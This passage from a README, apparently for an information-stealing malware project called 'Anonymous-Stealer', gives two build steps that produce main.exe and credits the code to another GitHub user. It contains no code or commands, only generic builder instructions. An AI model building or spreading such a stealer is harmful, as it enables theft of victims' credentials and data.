Mousquito/Anonymous-Stealer/README.md

 4. Run the builder by double clicking the `build.bat` file
 5. Follow instructions in builder and your exe will be found in the `dist` folder under the name `main.exe `

+I'd like to point out that I took the source code from addi00000. here is its github: https://github.com/addi00000